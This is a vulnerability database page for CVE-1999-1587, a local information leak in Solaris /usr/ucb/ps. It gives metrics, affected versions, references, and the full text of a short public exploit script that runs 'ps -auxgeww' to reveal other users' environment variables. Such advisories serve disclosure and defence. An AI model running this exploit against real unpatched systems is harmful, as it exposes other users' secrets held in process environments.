CVE-1999-1587 : Detail

CVE-1999-1587

0.05%V3
Local
2006-03-28
23h00 +00:00
2024-08-01
17h18 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

/usr/ucb/ps in Sun Microsystems Solaris 8 and 9, and certain earlier releases, allows local users to view the environment variables and values of arbitrary processes via the -e option.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.1 AV:L/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2242

Publication date : 2006-08-21 22h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

#!/bin/sh # # $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $ # # raptor_ucbps - information leak with Solaris /usr/ucb/ps # Copyright (c) 2006 Marco Ivaldi <[email protected]> # # A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow # unprivileged local users the ability to see environment variables and their # values for processes which belong to other users (Sun Alert ID: 102215). # # Absolutely nothing fancy, but it may turn out to be useful;) # # Usage: # $ chmod +x raptor_ucbps # $ ./raptor_ucbps # [...] # # Vulnerable platforms (SPARC): # Solaris 8 without patch 109023-05 [tested] # Solaris 9 without patch 120240-01 [tested] # # Vulnerable platforms (x86): # Solaris 8 without patch 109024-05 [untested] # Solaris 9 without patch 120239-01 [untested] # echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps" echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>" echo /usr/ucb/ps -auxgeww # milw0rm.com [2006-08-22]

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version 9.0

    Sun>>Sunos >> Version 5.8

    References

    http://www.vupen.com/english/advisories/2006/1123
    Tags : vdb-entry, x_refsource_VUPEN
    http://securitytracker.com/id?1015833
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/19426
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://sunsolve.sun.com/search/document.do?assetkey=1-26-102215-1
    Tags : vendor-advisory, x_refsource_SUNALERT
    http://www.securityfocus.com/bid/19662
    Tags : vdb-entry, x_refsource_BID
    http://www.osvdb.org/24200
    Tags : vdb-entry, x_refsource_OSVDB